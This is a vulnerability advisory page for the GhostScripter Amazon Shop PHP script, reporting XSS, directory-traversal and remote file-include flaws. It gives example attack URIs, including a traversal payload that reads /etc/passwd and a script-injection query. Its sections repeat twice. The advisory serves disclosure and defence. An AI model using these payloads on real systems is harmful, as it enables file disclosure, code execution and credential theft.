GhostScripter Amazon Shop Multiple Vulnerabilities
BID:33994
Info
GhostScripter Amazon Shop Multiple Vulnerabilities
| Bugtraq ID: | 33994 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 03 2009 12:00AM |
| Updated: | Mar 06 2009 06:46PM |
| Credit: | d3b4g |
| Vulnerable: |
GhostScripter Amazon Shop 0 |
| Not Vulnerable: | |
Discussion
GhostScripter Amazon Shop Multiple Vulnerabilities
Amazon Shop is prone to multiple vulnerabilities, including a cross-site scripting issue, a directory-traversal issue, and multiple remote file-include issues, because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these issues to run malicious PHP code in the context of the webserver process, run script code in an unsuspecting user's browser, steal cookie-based authentication credentials, or obtain sensitive information; other attacks are also possible.
Amazon Shop is prone to multiple vulnerabilities, including a cross-site scripting issue, a directory-traversal issue, and multiple remote file-include issues, because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these issues to run malicious PHP code in the context of the webserver process, run script code in an unsuspecting user's browser, steal cookie-based authentication credentials, or obtain sensitive information; other attacks are also possible.
Exploit / POC
GhostScripter Amazon Shop Multiple Vulnerabilities
An attacker can exploit these issues via a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/amazon/add_review.php?id=B00004TXJV&lang=invalid../../../../../../../../../../etc/passwd
http://www.example.com/amazon/cart.php?cmd=add&asin=[shell]
http://www.example.com/amazon/index.php?lang=[shell]
http://www.example.com/amazon/info.php?asin=[shell]
http://www.example.com/amazon/search.php?query=1<script>alert(xss)</script>&mode=all
The following exploit is available:
An attacker can exploit these issues via a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/amazon/add_review.php?id=B00004TXJV&lang=invalid../../../../../../../../../../etc/passwd
http://www.example.com/amazon/cart.php?cmd=add&asin=[shell]
http://www.example.com/amazon/index.php?lang=[shell]
http://www.example.com/amazon/info.php?asin=[shell]
http://www.example.com/amazon/search.php?query=1<script>alert(xss)</script>&mode=all
The following exploit is available:
Solution / Fix
GhostScripter Amazon Shop Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].